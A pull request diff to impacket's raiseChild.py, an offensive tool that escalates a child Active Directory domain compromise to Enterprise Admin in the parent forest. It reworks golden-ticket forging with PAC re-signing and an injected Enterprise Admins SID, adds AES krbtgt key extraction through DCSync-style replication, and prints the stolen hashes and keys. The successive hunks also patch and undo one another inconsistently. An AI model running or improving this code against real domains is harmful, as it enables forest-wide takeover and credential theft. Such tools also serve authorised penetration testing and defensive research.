### PR TITLE
raiseChild: fix PAC buffer preservation and add AES support for modern Windows

### DIFF
--- a/examples/raiseChild.py
+++ b/examples/raiseChild.py
@@ -984,20 +984,13 @@ class RAISECHILD:
         # Let's now clear the checksums
         if PAC_SERVER_CHECKSUM in pacInfos:
             serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
-            if serverChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
-                serverChecksum['Signature'] = b'\x00'*12
-            else:
-                serverChecksum['Signature'] = b'\x00'*16
+            serverChecksum['Signature'] = b'\x00' * len(bytes(serverChecksum['Signature']))
         else:
             raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
 
         if PAC_PRIVSVR_CHECKSUM in pacInfos:
             privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
-            privSvrChecksum['Signature'] = b'\x00'*12
-            if privSvrChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
-                privSvrChecksum['Signature'] = b'\x00'*12
-            else:
-                privSvrChecksum['Signature'] = b'\x00'*16
+            privSvrChecksum['Signature'] = b'\x00' * len(bytes(privSvrChecksum['Signature']))
         else:
             raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
 
@@ -1009,76 +1002,85 @@ class RAISECHILD:
 
 
         # We changed everything we needed to make us special. Now let's repack and calculate checksums
-        serverChecksumBlob = serverChecksum.getData()
-        serverChecksumAlignment = b'\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob))
+        # Update modified buffers in pacInfos
+        pacInfos[PAC_LOGON_INFO] = validationInfoBlob
+        pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
+        pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
 
-        privSvrChecksumBlob = privSvrChecksum.getData()
-        privSvrChecksumAlignment = b'\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob))
+        # Rebuild PAC preserving ALL original buffers in original order
+        def align8(data): return b'\x00' * (((len(data) + 7) // 8 * 8) - len(data))
 
-        # The offset are set from the beginning of the PAC_TYPE
-        # [MS-PAC] 2.4 PAC_INFO_BUFFER
-        offsetData = 8 + len(PAC_INFO_BUFFER().getData())*4
+        # Recalculate offsets: header = 8 + num_buffers * sizeof(PAC_INFO_BUFFER)
+        numBuffers = len(pacInfos)
+        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * numBuffers
 
-        # Let's build the PAC_INFO_BUFFER for each one of the elements
-        validationInfoIB = PAC_INFO_BUFFER()
-        validationInfoIB['ulType'] = PAC_LOGON_INFO
-        validationInfoIB['cbBufferSize'] =  len(validationInfoBlob)
-        validationInfoIB['Offset'] = offsetData
-        offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8
-
-        pacClientInfoIB = PAC_INFO_BUFFER()
-        pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
-        pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
-        pacClientInfoIB['Offset'] = offsetData
-        offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8
-
-        serverChecksumIB = PAC_INFO_BUFFER()
-        serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
-        serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
-        serverChecksumIB['Offset'] = offsetData
-        offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8
-
-        privSvrChecksumIB = PAC_INFO_BUFFER()
-        privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
-        privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
-        privSvrChecksumIB['Offset'] = offsetData
-        #offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) /8 *8
-
-        # Building the PAC_TYPE as specified in [MS-PAC]
-        buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \
-            privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \
-            pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment
-        buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
+        infoBuffers = b''
+        dataBlobs = b''
+        for ulType, data in pacInfos.items():
+            ib = PAC_INFO_BUFFER()
+            ib['ulType'] = ulType
+            ib['cbBufferSize'] = len(data)
+            ib['Offset'] = offsetData
+            infoBuffers += ib.getData()
+            padding = align8(data)
+            dataBlobs += data + padding
+            offsetData = (offsetData + len(data) + 7) // 8 * 8
 
         pacType = PACTYPE()
-        pacType['cBuffers'] = 4
+        pacType['cBuffers'] = numBuffers
         pacType['Version'] = 0
-        pacType['Buffers'] = buffers + buffersTail
+        pacType['Buffers'] = infoBuffers + dataBlobs
 
         blobToChecksum = pacType.getData()
 
         # If you want to do MD5, ucomment this
         checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
-        if serverChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
+        sigLen = len(bytes(serverChecksum['Signature']))
+        if sigLen == 12 and aesKey:
+            keyServer = Key(Enctype.AES256, unhexlify(aesKey))
+            serverChecksum['SignatureType'] = constants.ChecksumTypes.hmac_sha1_96_aes256.value
+            checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
+        elif serverChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
             keyServer = Key(Enctype.AES256, unhexlify(aesKey))
         elif serverChecksum['SignatureType'] == constants.ChecksumTypes.hmac_md5.value:
             keyServer = Key(Enctype.RC4, unhexlify(ntHash))
         else:
-            raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType'] )
+            raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType'])
 
-        checkSumFunctionPriv= _checksum_table[privSvrChecksum['SignatureType']]
-        if privSvrChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
+        checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
+        privSigLen = len(bytes(privSvrChecksum['Signature']))
+        if privSigLen == 12 and aesKey:
+            keyPriv = Key(Enctype.AES256, unhexlify(aesKey))
+            privSvrChecksum['SignatureType'] = constants.ChecksumTypes.hmac_sha1_96_aes256.value
+            checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
+        elif privSvrChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
             keyPriv = Key(Enctype.AES256, unhexlify(aesKey))
         elif privSvrChecksum['SignatureType'] == constants.ChecksumTypes.hmac_md5.value:
             keyPriv = Key(Enctype.RC4, unhexlify(ntHash))
         else:
-            raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType'] )
+            raise Exception('Invalid Priv checksum type 0x%x' % privSvrChecksum['SignatureType'])
 
         serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, 17, blobToChecksum)
         privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, 17, serverChecksum['Signature'])
 
-        buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
-        pacType['Buffers'] = buffers + buffersTail
+        # Update checksums in pacInfos and rebuild final PAC
+        pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
+        pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
+
+        offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * numBuffers
+        infoBuffers = b''
+        dataBlobs = b''
+        for ulType, data in pacInfos.items():
+            ib = PAC_INFO_BUFFER()
+            ib['ulType'] = ulType
+            ib['cbBufferSize'] = len(data)
+            ib['Offset'] = offsetData
+            infoBuffers += ib.getData()
+            padding = align8(data)
+            dataBlobs += data + padding
+            offsetData = (offsetData + len(data) + 7) // 8 * 8
+
+        pacType['Buffers'] = infoBuffers + dataBlobs
 
         authorizationData = AuthorizationData()
         authorizationData[0] = noValue
@@ -1127,36 +1129,52 @@ class RAISECHILD:
         userName = Principal(childCreds['username'], type=constants.PrincipalNameType.NT_PRINCIPAL.value)
         TGT = {}
         TGS = {}
-        while True:
+
+        # Build ordered list of credential attempts: AES first (modern DCs), then RC4, then password
+        credAttempts = []
+        if childCreds['aesKey'] is not None:
+            credAttempts.append(('AES', {'lmhash': '', 'nthash': '', 'aesKey': childCreds['aesKey']}))
+        if childCreds['nthash'] != '':
+            credAttempts.append(('RC4', {'lmhash': childCreds['lmhash'], 'nthash': childCreds['nthash'], 'aesKey': None}))
+        if not credAttempts:
+            credAttempts.append(('password', {'lmhash': b'', 'nthash': b'', 'aesKey': None}))
+
+        tgt = cipher = oldSessionKey = sessionKey = None
+        for credType, cred in credAttempts:
             try:
+                logging.info('Trying %s for TGT request' % credType)
                 tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, childCreds['password'],
-                                                                        childCreds['domain'], childCreds['lmhash'],
-                                                                        childCreds['nthash'], None, self.__kdcHost)
+                                                                        childCreds['domain'], cred['lmhash'],
+                                                                        cred['nthash'], cred['aesKey'], self.__kdcHost)
+                logging.info('TGT obtained using %s' % credType)
+                break
             except KerberosError as e:
-                if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
-                    # We might face this if the target does not support AES (most probably
-                    # Windows XP). So, if that's the case we'll force using RC4 by converting
-                    # the password to lm/nt hashes and hope for the best. If that's already
-                    # done, byebye.
-                    if childCreds['lmhash'] == '' and childCreds['nthash'] == '':
-                        from impacket.ntlm import compute_lmhash, compute_nthash
-                        childCreds['lmhash'] = compute_lmhash(childCreds['password'])
-                        childCreds['nthash'] = compute_nthash(childCreds['password'])
-                        continue
-                    else:
-                        raise
+                if e.getErrorCode() in (constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value,
+                                        constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value):
+                    logging.warning('%s failed (error 0x%x), trying next method' % (credType, e.getErrorCode()))
+                    continue
                 else:
                     raise
+        if tgt is None:
+            raise Exception('Could not obtain TGT with any available credentials (tried: %s)' % ', '.join(c[0] for c in credAttempts))
 
-            # We have a TGT, let's make it golden
-            goldenTicket, cipher, sessionKey = self.makeGolden(tgt, cipher, sessionKey, credentials['nthash'],
-                                                               credentials['aesKey'], entepriseSid + '-519')
+        # Track which krbtgt key type we're using for golden ticket forging
+        # Start with RC4, fall back to AES from DCSync'd krbtgt creds if available
+        goldenKeyAttempts = []
+        goldenKeyAttempts.append(('RC4', credentials['nthash'], credentials['aesKey']))
+        if credentials['aesKey'] and credentials['aesKey'] != b'':
+            goldenKeyAttempts.append(('AES', credentials['nthash'], credentials['aesKey']))
+
+        for goldenKeyType, ntHash, aesKey in goldenKeyAttempts:
+            # Re-obtain TGT for each attempt since makeGolden consumes it
+            tgt2, cipher2, oldSessionKey2, sessionKey2 = tgt, cipher, oldSessionKey, sessionKey
+            goldenTicket, goldenCipher, goldenSessionKey = self.makeGolden(tgt2, cipher2, sessionKey2, ntHash,
+                                                                           aesKey, entepriseSid + '-519')
             TGT['KDC_REP'] = goldenTicket
-            TGT['cipher'] = cipher
-            TGT['oldSessionKey'] = oldSessionKey
-            TGT['sessionKey'] = sessionKey
+            TGT['cipher'] = goldenCipher
+            TGT['oldSessionKey'] = oldSessionKey2
+            TGT['sessionKey'] = goldenSessionKey
 
-            # We've done what we wanted, now let's call the regular getKerberosTGS to get a new ticket for cifs
             if self.__target is None:
                 serverName = Principal('cifs/%s' % self.getMachineName(gethostbyname(parentName)),
                                        type=constants.PrincipalNameType.NT_SRV_INST.value)
@@ -1164,29 +1182,30 @@ class RAISECHILD:
                 serverName = Principal('cifs/%s' % self.__target, type=constants.PrincipalNameType.NT_SRV_INST.value)
             try:
                 logging.debug('Getting TGS for SPN %s' % serverName)
+                print('[*] Golden ticket etype: %s (using %s krbtgt key)' % (goldenCipher.enctype, goldenKeyType))
+                print('[*] Requesting TGS for %s' % serverName)
                 tgsCIFS, cipherCIFS, oldSessionKeyCIFS, sessionKeyCIFS = getKerberosTGS(serverName,
-                                                                                        childCreds['domain'], None,
-                                                                                        goldenTicket, cipher,
-                                                                                        sessionKey)
+                                                                                        childCreds['domain'], self.__kdcHost,
+                                                                                        goldenTicket, goldenCipher,
+                                                                                        goldenSessionKey)
+                TGT['cipher'] = goldenCipher
+                TGT['sessionKey'] = goldenSessionKey
                 TGS['KDC_REP'] = tgsCIFS
                 TGS['cipher'] = cipherCIFS
                 TGS['oldSessionKey'] = oldSessionKeyCIFS
                 TGS['sessionKey'] = sessionKeyCIFS
                 break
             except KerberosError as e:
-                if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
-                    # We might face this if the target does not support AES (most probably
-                    # Windows XP). So, if that's the case we'll force using RC4 by converting
-                    # the password to lm/nt hashes and hope for the best. If that's already
-                    # done, byebye.
-                    if childCreds['lmhash'] == '' and childCreds['nthash'] == '':
-                        from impacket.ntlm import compute_lmhash, compute_nthash
-                        childCreds['lmhash'] = compute_lmhash(childCreds['password'])
-                        childCreds['nthash'] = compute_nthash(childCreds['password'])
-                    else:
-                        raise
+                if e.getErrorCode() in (constants.ErrorCodes.KDC_ERR_TGT_REVOKED.value,
+                                        constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value):
+                    logging.warning('Golden ticket with %s key rejected (0x%x), trying next key type' % (goldenKeyType, e.getErrorCode()))
+                    continue
                 else:
                     raise
+            else:
+                break
+        else:
+            raise Exception('Golden ticket was rejected with all available krbtgt key types')
 
         # 6) Use the generated ticket to log into the parent and get the krbtgt/admin info
         # 6) Use the generated ticket to log into the parent and get the target-user info
@@ -1279,13 +1298,17 @@ if __name__ == '__main__':
         print("\tpython raiseChild.py childDomain.net/adminuser\n")
         print("\tthe password will be asked, or\n")
         print("\tpython raiseChild.py childDomain.net/adminuser:mypwd\n")
-        print("\tor if you just have the hashes\n")
+        print("\tor if you just have the NTLM hashes\n")
         print("\tpython raiseChild.py -hashes LMHASH:NTHASH childDomain.net/adminuser\n")
-
+        print("\tor if you have the AES key (recommended for modern Windows Server 2019/2022/2025)\n")
+        print("\tpython raiseChild.py -aesKey <hex_aes256_key> childDomain.net/adminuser\n")
+        print("\tor combine both - AES will be tried first, RC4 used as fallback\n")
+        print("\tpython raiseChild.py -hashes LMHASH:NTHASH -aesKey <hex_aes256_key> childDomain.net/adminuser\n")
+        print("\tNote: AES keys can be obtained via: impacket-secretsdump -just-dc-user DOMAIN/username ...\n")
         print("\tThis will perform the attack and then psexec against target-exec as Enterprise Admin")
-        print("\tpython raiseChild.py -target-exec targetHost childDomainn.net/adminuser\n")
+        print("\tpython raiseChild.py -target-exec targetHost childDomain.net/adminuser\n")
         print("\tThis will perform the attack and then psexec against target-exec as User with RID 1101")
-        print("\tpython raiseChild.py -target-exec targetHost -targetRID 1101 childDomainn.net/adminuser\n")
+        print("\tpython raiseChild.py -target-exec targetHost -targetRID 1101 childDomain.net/adminuser\n")
         print("\tThis will save the final goldenTicket generated in the ccache target file")
         print("\tpython raiseChild.py -w ccache childDomain.net/adminuser\n")
         sys.exit(1)

--- a/examples/raiseChild.py
+++ b/examples/raiseChild.py
@@ -1136,8 +1136,10 @@ class RAISECHILD:
             credAttempts.append(('AES', {'lmhash': '', 'nthash': '', 'aesKey': childCreds['aesKey']}))
         if childCreds['nthash'] != '':
             credAttempts.append(('RC4', {'lmhash': childCreds['lmhash'], 'nthash': childCreds['nthash'], 'aesKey': None}))
-        if not credAttempts:
+        if childCreds['password'] != '':
             credAttempts.append(('password', {'lmhash': b'', 'nthash': b'', 'aesKey': None}))
+        if not credAttempts:
+            raise Exception('No credentials provided')
 
         tgt = cipher = oldSessionKey = sessionKey = None
         for credType, cred in credAttempts:
@@ -1161,13 +1163,17 @@ class RAISECHILD:
         # Track which krbtgt key type we're using for golden ticket forging
         # Start with RC4, fall back to AES from DCSync'd krbtgt creds if available
         goldenKeyAttempts = []
-        goldenKeyAttempts.append(('RC4', credentials['nthash'], credentials['aesKey']))
-        if credentials['aesKey'] and credentials['aesKey'] != b'':
-            goldenKeyAttempts.append(('AES', credentials['nthash'], credentials['aesKey']))
+        goldenKeyAttempts.append(('RC4', credentials['nthash'], credentials['aesKey'],
+                                  {'lmhash': childCreds['lmhash'], 'nthash': childCreds['nthash'], 'aesKey': None}))
+        if credentials['aesKey'] and credentials['aesKey'] != b'' and childCreds['aesKey'] is not None:
+            goldenKeyAttempts.append(('AES', credentials['nthash'], credentials['aesKey'],
+                                      {'lmhash': '', 'nthash': '', 'aesKey': childCreds['aesKey']}))
 
-        for goldenKeyType, ntHash, aesKey in goldenKeyAttempts:
-            # Re-obtain TGT for each attempt since makeGolden consumes it
-            tgt2, cipher2, oldSessionKey2, sessionKey2 = tgt, cipher, oldSessionKey, sessionKey
+        for goldenKeyType, ntHash, aesKey, childCred in goldenKeyAttempts:
+            # Re-obtain TGT with matching enctype for this golden ticket attempt
+            tgt2, cipher2, oldSessionKey2, sessionKey2 = getKerberosTGT(
+                userName, childCreds['password'], childCreds['domain'],
+                childCred['lmhash'], childCred['nthash'], childCred['aesKey'], self.__kdcHost)
             goldenTicket, goldenCipher, goldenSessionKey = self.makeGolden(tgt2, cipher2, sessionKey2, ntHash,
                                                                            aesKey, entepriseSid + '-519')
             TGT['KDC_REP'] = goldenTicket

--- a/examples/raiseChild.py
+++ b/examples/raiseChild.py
@@ -1110,6 +1110,25 @@ class RAISECHILD:
 
         return encoder.encode(asRep), originalCipher, sessionKey
 
+    @staticmethod
+    def _has_credential_material(value):
+        return value not in (None, '', b'')
+
+    @staticmethod
+    def _get_rc4_retry_cred(childCreds):
+        if childCreds['password'] != '':
+            return {
+                'lmhash': LMOWFv1(childCreds['password']),
+                'nthash': NTOWFv1(childCreds['password']),
+                'aesKey': None,
+            }
+
+        return None
+
+    @staticmethod
+    def _same_rc4_creds(leftCreds, rightCreds):
+        return leftCreds['lmhash'] == rightCreds['lmhash'] and leftCreds['nthash'] == rightCreds['nthash']
+
     def raiseUp(self, childName, childCreds, parentName):
         logging.info('Raising %s to %s' % (childName, parentName))
 
@@ -1130,18 +1149,24 @@ class RAISECHILD:
         TGT = {}
         TGS = {}
 
-        # Build ordered list of credential attempts: AES first (modern DCs), then RC4, then password
+        # Build ordered list of end-to-end credential methods. Explicit key material goes first,
+        # then password, then an RC4 retry derived from the password if it would be distinct.
         credAttempts = []
-        if childCreds['aesKey'] is not None:
+        explicitRc4Cred = None
+        if self._has_credential_material(childCreds['aesKey']):
             credAttempts.append(('AES', {'lmhash': '', 'nthash': '', 'aesKey': childCreds['aesKey']}))
-        if childCreds['nthash'] != '':
-            credAttempts.append(('RC4', {'lmhash': childCreds['lmhash'], 'nthash': childCreds['nthash'], 'aesKey': None}))
+        if self._has_credential_material(childCreds['nthash']):
+            explicitRc4Cred = {'lmhash': childCreds['lmhash'], 'nthash': childCreds['nthash'], 'aesKey': None}
+            credAttempts.append(('RC4', explicitRc4Cred))
         if childCreds['password'] != '':
             credAttempts.append(('password', {'lmhash': b'', 'nthash': b'', 'aesKey': None}))
+            passwordRc4Cred = self._get_rc4_retry_cred(childCreds)
+            if passwordRc4Cred is not None and (
+                    explicitRc4Cred is None or not self._same_rc4_creds(passwordRc4Cred, explicitRc4Cred)):
+                credAttempts.append(('password->RC4', passwordRc4Cred))
         if not credAttempts:
             raise Exception('No credentials provided')
 
-        tgt = cipher = oldSessionKey = sessionKey = None
         for credType, cred in credAttempts:
             try:
                 logging.info('Trying %s for TGT request' % credType)
@@ -1149,7 +1174,6 @@ class RAISECHILD:
                                                                         childCreds['domain'], cred['lmhash'],
                                                                         cred['nthash'], cred['aesKey'], self.__kdcHost)
                 logging.info('TGT obtained using %s' % credType)
-                break
             except KerberosError as e:
                 if e.getErrorCode() in (constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value,
                                         constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value):
@@ -1157,28 +1181,12 @@ class RAISECHILD:
                     continue
                 else:
                     raise
-        if tgt is None:
-            raise Exception('Could not obtain TGT with any available credentials (tried: %s)' % ', '.join(c[0] for c in credAttempts))
-
-        # Track which krbtgt key type we're using for golden ticket forging
-        # Start with RC4, fall back to AES from DCSync'd krbtgt creds if available
-        goldenKeyAttempts = []
-        goldenKeyAttempts.append(('RC4', credentials['nthash'], credentials['aesKey'],
-                                  {'lmhash': childCreds['lmhash'], 'nthash': childCreds['nthash'], 'aesKey': None}))
-        if credentials['aesKey'] and credentials['aesKey'] != b'' and childCreds['aesKey'] is not None:
-            goldenKeyAttempts.append(('AES', credentials['nthash'], credentials['aesKey'],
-                                      {'lmhash': '', 'nthash': '', 'aesKey': childCreds['aesKey']}))
-
-        for goldenKeyType, ntHash, aesKey, childCred in goldenKeyAttempts:
-            # Re-obtain TGT with matching enctype for this golden ticket attempt
-            tgt2, cipher2, oldSessionKey2, sessionKey2 = getKerberosTGT(
-                userName, childCreds['password'], childCreds['domain'],
-                childCred['lmhash'], childCred['nthash'], childCred['aesKey'], self.__kdcHost)
-            goldenTicket, goldenCipher, goldenSessionKey = self.makeGolden(tgt2, cipher2, sessionKey2, ntHash,
-                                                                           aesKey, entepriseSid + '-519')
+            goldenTicket, goldenCipher, goldenSessionKey = self.makeGolden(tgt, cipher, sessionKey,
+                                                                           credentials['nthash'], credentials['aesKey'],
+                                                                           entepriseSid + '-519')
             TGT['KDC_REP'] = goldenTicket
             TGT['cipher'] = goldenCipher
-            TGT['oldSessionKey'] = oldSessionKey2
+            TGT['oldSessionKey'] = oldSessionKey
             TGT['sessionKey'] = goldenSessionKey
 
             if self.__target is None:
@@ -1188,7 +1196,7 @@ class RAISECHILD:
                 serverName = Principal('cifs/%s' % self.__target, type=constants.PrincipalNameType.NT_SRV_INST.value)
             try:
                 logging.debug('Getting TGS for SPN %s' % serverName)
-                print('[*] Golden ticket etype: %s (using %s krbtgt key)' % (goldenCipher.enctype, goldenKeyType))
+                print('[*] Golden ticket etype: %s (using %s child credentials)' % (goldenCipher.enctype, credType))
                 print('[*] Requesting TGS for %s' % serverName)
                 tgsCIFS, cipherCIFS, oldSessionKeyCIFS, sessionKeyCIFS = getKerberosTGS(serverName,
                                                                                         childCreds['domain'], self.__kdcHost,
@@ -1204,14 +1212,15 @@ class RAISECHILD:
             except KerberosError as e:
                 if e.getErrorCode() in (constants.ErrorCodes.KDC_ERR_TGT_REVOKED.value,
                                         constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value):
-                    logging.warning('Golden ticket with %s key rejected (0x%x), trying next key type' % (goldenKeyType, e.getErrorCode()))
+                    logging.warning('Golden ticket built from %s child credentials rejected (0x%x), trying next method' % (
+                        credType, e.getErrorCode()))
                     continue
                 else:
                     raise
             else:
                 break
         else:
-            raise Exception('Golden ticket was rejected with all available krbtgt key types')
+            raise Exception('Golden ticket was rejected with all available child credential methods')
 
         # 6) Use the generated ticket to log into the parent and get the krbtgt/admin info
         # 6) Use the generated ticket to log into the parent and get the target-user info

--- a/examples/raiseChild.py
+++ b/examples/raiseChild.py
@@ -86,7 +86,7 @@ from impacket.krb5.types import Principal, KerberosTime
 from impacket.krb5 import constants
 from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS, KerberosError
 from impacket.krb5.asn1 import AS_REP, AuthorizationData, AD_IF_RELEVANT, EncTicketPart
-from impacket.krb5.crypto import Key, _enctype_table
+from impacket.krb5.crypto import _enctype_table, get_kerberos_key_for_enctype, get_matching_aes_key
 from impacket.dcerpc.v5.ndr import NDRULONG
 from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
 from pyasn1.codec.der import decoder, encoder
@@ -737,6 +737,11 @@ class RAISECHILD:
                     if len(plainText) < 24:
                         plainText = None
 
+        kerberosKeys = {
+            'aes128Key': None,
+            'aes256Key': None,
+        }
+
         if plainText:
             try:
                 userProperties = samr.USER_PROPERTIES(plainText)
@@ -758,9 +763,13 @@ class RAISECHILD:
                         keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]
 
                         if  keyDataNew['KeyType'] in self.KERBEROS_TYPE:
-                            # Give me only the AES256
-                            if keyDataNew['KeyType'] == 18:
-                                return hexlify(keyValue)
+                            if keyDataNew['KeyType'] == int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value):
+                                kerberosKeys['aes128Key'] = hexlify(keyValue)
+                            elif keyDataNew['KeyType'] == int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value):
+                                kerberosKeys['aes256Key'] = hexlify(keyValue)
+
+        if kerberosKeys['aes128Key'] or kerberosKeys['aes256Key']:
+            return kerberosKeys
 
         return None
 
@@ -869,7 +878,7 @@ class RAISECHILD:
                 crackedName['pmsgOut']['V1']['pResult']['cItems'], userName))
 
             rid, lmhash, nthash = self.__decryptHash(userRecord, userRecord['pmsgOut']['V6']['PrefixTableSrc']['pPrefixEntry'])
-            aesKey = self.__decryptSupplementalInfo(userRecord, userRecord['pmsgOut']['V6']['PrefixTableSrc']['pPrefixEntry'])
+            kerberosKeys = self.__decryptSupplementalInfo(userRecord, userRecord['pmsgOut']['V6']['PrefixTableSrc']['pPrefixEntry'])
         except Exception as e:
             logging.debug('Exception:', exc_info=True)
             logging.error("Error while processing user!")
@@ -878,26 +887,43 @@ class RAISECHILD:
 
         self.__drsr.disconnect()
         self.__drsr = None
+        aes128Key = aes256Key = None
+        if kerberosKeys is not None:
+            aes128Key = kerberosKeys['aes128Key']
+            aes256Key = kerberosKeys['aes256Key']
         creds = {}
         creds['lmhash'] = lmhash
         creds['nthash'] = nthash
-        creds['aesKey'] = aesKey
+        creds['aes128Key'] = aes128Key
+        creds['aes256Key'] = aes256Key
         return rid, creds
 
     @staticmethod
-    def makeGolden(tgt, originalCipher, sessionKey, ntHash, aesKey, extraSid):
+    def _printKerberosKeys(domainName, targetUser, credentials):
+        for keyName, label in (
+                ('aes256Key', 'aes256-cts-hmac-sha1-96s'),
+                ('aes128Key', 'aes128-cts-hmac-sha1-96s')):
+            if credentials.get(keyName):
+                print('%s/%s:%s:%s' % (domainName, targetUser, label, credentials[keyName].decode('utf-8')))
+
+    @staticmethod
+    def makeGolden(tgt, originalCipher, sessionKey, ntHash, extraSid, aes128Key=None, aes256Key=None):
         asRep = decoder.decode(tgt, asn1Spec = AS_REP())[0]
 
         # Let's extract Ticket's enc-data
         cipherText = asRep['ticket']['enc-part']['cipher']
 
         cipher = _enctype_table[asRep['ticket']['enc-part']['etype']]
-        if cipher.enctype == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
-            key = Key(cipher.enctype, unhexlify(aesKey))
-        elif cipher.enctype == constants.EncryptionTypes.rc4_hmac.value:
-            key = Key(cipher.enctype, unhexlify(ntHash))
-        else:
-            raise RetryableGoldenTicketError('Unsupported enctype 0x%x' % cipher.enctype)
+        ticketAesKey = get_matching_aes_key(cipher.enctype, aes128_key=aes128Key, aes256_key=aes256Key)
+        try:
+            key = get_kerberos_key_for_enctype(
+                cipher.enctype,
+                nt_hash=ntHash,
+                aes128_key=aes128Key,
+                aes256_key=aes256Key,
+            )
+        except ValueError as e:
+            raise RetryableGoldenTicketError(str(e))
 
         # Key Usage 2
         # AS-REP Ticket and TGS-REP Ticket (includes TGS session
@@ -990,7 +1016,7 @@ class RAISECHILD:
         # We changed everything we needed to make us special. Now let's repack
         # and calculate checksums through the shared PAC helper.
         pacInfos[PAC_LOGON_INFO] = validationInfoBlob
-        pacType = sign_pac(pacInfos, aes_key=aesKey, nt_hash=ntHash, infer_aes_signature_type=True)
+        pacType = sign_pac(pacInfos, aes_key=ticketAesKey, nt_hash=ntHash, infer_aes_signature_type=True)
 
         authorizationData = AuthorizationData()
         authorizationData[0] = noValue
@@ -1003,12 +1029,15 @@ class RAISECHILD:
         encodedEncTicketPart = encoder.encode(encTicketPart)
 
         cipher = _enctype_table[asRep['ticket']['enc-part']['etype']]
-        if cipher.enctype == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
-            key = Key(cipher.enctype, unhexlify(aesKey))
-        elif cipher.enctype == constants.EncryptionTypes.rc4_hmac.value:
-            key = Key(cipher.enctype, unhexlify(ntHash))
-        else:
-            raise RetryableGoldenTicketError('Unsupported enctype 0x%x' % cipher.enctype)
+        try:
+            key = get_kerberos_key_for_enctype(
+                cipher.enctype,
+                nt_hash=ntHash,
+                aes128_key=aes128Key,
+                aes256_key=aes256Key,
+            )
+        except ValueError as e:
+            raise RetryableGoldenTicketError(str(e))
 
         # Key Usage 2
         # AS-REP Ticket and TGS-REP Ticket (includes TGS session
@@ -1021,12 +1050,8 @@ class RAISECHILD:
         return encoder.encode(asRep), originalCipher, sessionKey
 
     @staticmethod
-    def _has_credential_material(value):
-        return value not in (None, '', b'')
-
-    @staticmethod
     def _get_rc4_retry_cred(childCreds):
-        if childCreds['password'] != '':
+        if childCreds['password']:
             return {
                 'lmhash': LMOWFv1(childCreds['password']),
                 'nthash': NTOWFv1(childCreds['password']),
@@ -1052,7 +1077,7 @@ class RAISECHILD:
         rid, credentials = self.getCredentials(targetUser, childName, childCreds)
         print('%s/%s:%s:%s:%s:::' % (
         childName, targetUser, rid, credentials['lmhash'].decode('utf-8'), credentials['nthash'].decode('utf-8')))
-        print('%s/%s:aes256-cts-hmac-sha1-96s:%s' % (childName, targetUser, credentials['aesKey'].decode('utf-8')))
+        self._printKerberosKeys(childName, targetUser, credentials)
 
